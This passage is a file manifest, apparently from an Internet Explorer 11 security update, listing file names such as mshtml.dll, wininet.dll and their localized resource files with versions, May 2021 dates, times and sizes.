\nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 53,248 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 52,736 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 51,712 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 50,688 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 50,688 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 50,176 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 50,176 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 30,720 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 30,720 \nwininet.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 30,720 \ninetcpl.cpl| 11.0.9600.20038| 17-May-2021| 21:50| 2,058,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 10,752 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 307,200 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 293,888 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 290,304 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 289,280 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 299,008 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 303,104 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 282,112 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 296,960 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 283,648 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 291,840 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 299,520 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 275,968 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 290,816 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 293,376 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 296,960 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 258,048 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 256,512 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 289,280 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 288,256 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 285,184 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 295,424 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 297,472 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 292,864 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 295,424 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 294,400 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 294,400 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 292,864 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 290,816 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 288,768 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 286,208 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 281,600 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 286,720 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 292,352 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 242,176 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 243,200 \nmshtml.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 243,200 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 61,440 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 73,728 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 67,584 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 67,584 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 74,240 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 78,848 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 61,440 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 74,752 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 62,464 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 68,096 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 75,264 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 68,608 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 72,192 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 73,216 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 41,472 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 37,888 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 68,608 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 67,584 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 65,536 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 74,240 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 70,656 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 71,168 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 71,680 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 71,168 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 69,632 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 68,096 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 68,608 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 68,096 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 65,536 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 69,120 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 29,696 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 30,720 \nF12Resources.dll.mui| 11.0.9600.20038| 20-May-2021| 16:08| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.20038| 17-May-2021| 21:59| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.20038| 17-May-2021| 22:01| 230,912 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 46,080 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 50,176 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 49,664 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 51,712 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 54,272 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 48,128 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 50,176 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 47,616 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 49,152 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 50,688 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 45,056 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 49,152 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 49,152 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 49,664 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 39,936 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 39,424 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 47,616 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 47,616 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 51,200 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 50,688 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 49,664 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 50,176 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 49,152 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 50,176 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 49,664 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 48,640 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 48,128 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 49,152 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 48,128 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 35,328 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 35,328 \nurlmon.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 35,328 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 9,728 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 9,728 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 11,264 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 9,728 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 9,216 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 7,680 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 7,680 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 9,728 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 10,752 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 9,728 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 9,728 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 10,240 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 6,656 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 6,656 \noccache.dll.mui| 11.0.9600.20038| 20-May-2021| 16:08| 6,656 \nwininet.dll| 11.0.9600.20038| 17-May-2021| 21:39| 4,387,840 \njsproxy.dll| 11.0.9600.20038| 17-May-2021| 22:13| 47,104 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:38| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:39| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:40| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:41| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:42| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:43| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 17:13| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:44| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:44| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:46| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:46| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:47| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:48| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:48| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:49| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:50| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:51| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:52| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:54| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:55| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:56| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:56| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:57| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:58| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 15:59| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:00| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:00| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:01| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:03| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:05| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:06| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20038| 20-May-2021| 16:07| 73,728 \niedkcs32.dll| 18.0.9600.20038| 20-May-2021| 15:38| 341,896 \ninstall.ins| Not versioned| 17-May-2021| 20:00| 464 \nieapfltr.dat| 10.0.9301.0| 8-Apr-2021| 17:55| 616,104 \nieapfltr.dll| 11.0.9600.20038| 17-May-2021| 21:28| 710,656 \ntdc.ocx| 11.0.9600.20038| 17-May-2021| 21:59| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.20038| 17-May-2021| 22:21| 489,472 \niedvtool.dll| 11.0.9600.20038| 17-May-2021| 22:47| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.20038| 17-May-2021| 22:22| 38,912 \ndxtmsft.dll| 11.0.9600.20038| 17-May-2021| 22:03| 415,744 \ndxtrans.dll| 11.0.9600.20038| 17-May-2021| 21:56| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 17-May-2021| 19:58| 11,892 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 3,584 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 3,584 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 4,096 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 3,584 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 3,584 \nF12.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 3,584 \nDiagnosticsTap.dll| 11.0.9600.20038| 17-May-2021| 22:02| 175,104 \nF12Resources.dll| 11.0.9600.20038| 17-May-2021| 22:25| 10,948,096 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 2,048 \nF12Tools.dll| 11.0.9600.20038| 17-May-2021| 22:02| 256,000 \nF12.dll| 11.0.9600.20038| 17-May-2021| 21:53| 1,207,808 \nmsfeeds.dll| 11.0.9600.20038| 17-May-2021| 21:50| 696,320 \nmsfeeds.mof| Not versioned| 17-May-2021| 20:12| 1,518 \nmsfeedsbs.mof| Not versioned| 17-May-2021| 20:12| 1,574 \nmsfeedsbs.dll| 11.0.9600.20038| 17-May-2021| 21:57| 52,736 \nmsfeedssync.exe| 11.0.9600.20038| 17-May-2021| 22:19| 11,776 \nhtml.iec| 2019.0.0.20038| 17-May-2021| 22:18| 341,504 \nmshtmled.dll| 11.0.9600.20038| 17-May-2021| 21:56| 76,800 \nmshtmlmedia.dll| 11.0.9600.20038| 17-May-2021| 21:48| 1,155,584 \nmshtml.dll| 11.0.9600.20038| 17-May-2021| 22:47| 20,294,656 \nmshtml.tlb| 11.0.9600.20038| 17-May-2021| 22:29| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 17-May-2021| 19:59| 3,228 \nieetwcollector.exe| 11.0.9600.20038| 17-May-2021| 22:10| 104,960 \nieetwproxystub.dll| 11.0.9600.20038| 17-May-2021| 22:18| 47,616 \nieetwcollectorres.dll| 11.0.9600.20038| 17-May-2021| 22:29| 4,096 \nielowutil.exe| 11.0.9600.20038| 17-May-2021| 22:12| 221,184 \nieproxy.dll| 11.0.9600.20038| 17-May-2021| 21:26| 310,784 \nIEShims.dll| 11.0.9600.20038| 17-May-2021| 21:32| 290,304 \nWindows Pop-up Blocked.wav| Not versioned| 8-Apr-2021| 17:57| 85,548 \nWindows Information Bar.wav| Not versioned| 8-Apr-2021| 17:57| 23,308 \nWindows Feed Discovered.wav| Not versioned| 8-Apr-2021| 17:57| 19,884 \nWindows Navigation Start.wav| Not versioned| 8-Apr-2021| 17:57| 11,340 \nbing.ico| Not versioned| 8-Apr-2021| 17:56| 5,430 \nieUnatt.exe| 11.0.9600.20038| 17-May-2021| 22:10| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 20-May-2021| 17:12| 2,956 \njsprofilerui.dll| 11.0.9600.20038| 17-May-2021| 21:57| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20038| 17-May-2021| 22:08| 1,399,296 \nMshtmlDac.dll| 11.0.9600.20038| 17-May-2021| 22:17| 64,000 \nnetworkinspection.dll| 11.0.9600.20038| 17-May-2021| 21:54| 1,075,200 \noccache.dll| 11.0.9600.20038| 17-May-2021| 21:54| 130,048 \ndesktop.ini| Not versioned| 8-Apr-2021| 17:55| 65 \nwebcheck.dll| 11.0.9600.20038| 17-May-2021| 21:50| 230,400 \ndesktop.ini| Not versioned| 8-Apr-2021| 17:55| 65 \nmsrating.dll| 11.0.9600.20038| 17-May-2021| 21:57| 168,960 \nicrav03.rat| Not versioned| 8-Apr-2021| 17:55| 8,798 \nticrf.rat| Not versioned| 8-Apr-2021| 17:55| 1,988 \niertutil.dll| 11.0.9600.20038| 